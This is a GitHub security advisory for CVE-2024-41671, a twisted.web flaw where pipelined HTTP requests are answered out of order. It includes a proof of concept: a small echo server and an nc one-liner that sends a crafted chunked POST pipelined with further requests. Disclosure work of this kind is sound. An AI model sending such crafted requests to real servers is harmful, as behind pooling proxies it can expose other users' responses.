Skip to content

twisted.web has disordered HTTP pipeline response

High severity GitHub Reviewed Published Jul 29, 2024 in twisted/twisted • Updated Aug 8, 2024

Package

pip twisted (pip)

Affected versions

<= 24.3.0

Patched versions

24.7.0rc1

Description

Summary

The HTTP 1.0 and 1.1 server provided by twisted.web could process pipelined HTTP requests out-of-order, possibly resulting in information disclosure.

PoC

  1. Start a fresh Debian container:
docker run --workdir /repro --rm -it debian:bookworm-slim
  1. Install twisted and its dependencies:
apt -y update && apt -y install ncat git python3 python3-pip \
    && git clone --recurse-submodules https://github.com/twisted/twisted \
    && cd twisted \
    && pip3 install --break-system-packages .
  1. Run a twisted.web HTTP server that echos received requests' methods. e.g., the following:
from twisted.web import server, resource
from twisted.internet import reactor

class TheResource(resource.Resource):
    isLeaf = True

    def render_GET(self, request) -> bytes:
        return b"GET"

    def render_POST(self, request) -> bytes:
        return b"POST"

site = server.Site(TheResource())
reactor.listenTCP(80, site)
reactor.run()
  1. Send it a POST request with a chunked message body, pipelined with another POST request, wait a second, then send a GET request on the same connection:
(printf 'POST / HTTP/1.1\r\nTransfer-Encoding: chunked\r\n\r\n0\r\n\r\nPOST / HTTP/1.1\r\nContent-Length: 0\r\n\r\n'; sleep 1; printf 'GET / HTTP/1.1\r\n\r\n'; sleep 1) | nc localhost 80
  1. Observe that the responses arrive out of order:
HTTP/1.1 200 OK
Server: TwistedWeb/24.3.0.post0
Date: Tue, 09 Jul 2024 06:19:41 GMT
Content-Length: 5
Content-Type: text/html

POST
HTTP/1.1 200 OK
Server: TwistedWeb/24.3.0.post0
Date: Tue, 09 Jul 2024 06:19:42 GMT
Content-Length: 4
Content-Type: text/html

GET
HTTP/1.1 200 OK
Server: TwistedWeb/24.3.0.post0
Date: Tue, 09 Jul 2024 06:19:42 GMT
Content-Length: 5
Content-Type: text/html

POST

Impact

See GHSA-xc8x-vp79-p3wm. Further, for instances of twisted.web HTTP servers deployed behind reverse proxies that implement connection pooling, it may be possible for remote attackers to receive responses intended for other clients of the twisted.web server.

References

@adiroiban adiroiban published to twisted/twisted Jul 29, 2024
Published by the National Vulnerability Database Jul 29, 2024
Published to the GitHub Advisory Database Jul 29, 2024
Reviewed Jul 29, 2024
Last updated Aug 8, 2024

Severity

High

EPSS score

0.045%
(16th percentile)

Weaknesses

CVE ID

CVE-2024-41671

GHSA ID

GHSA-c8m8-j448-xjx7

Source code

Credits

Loading Checking history
See something to contribute? Suggest improvements for this vulnerability.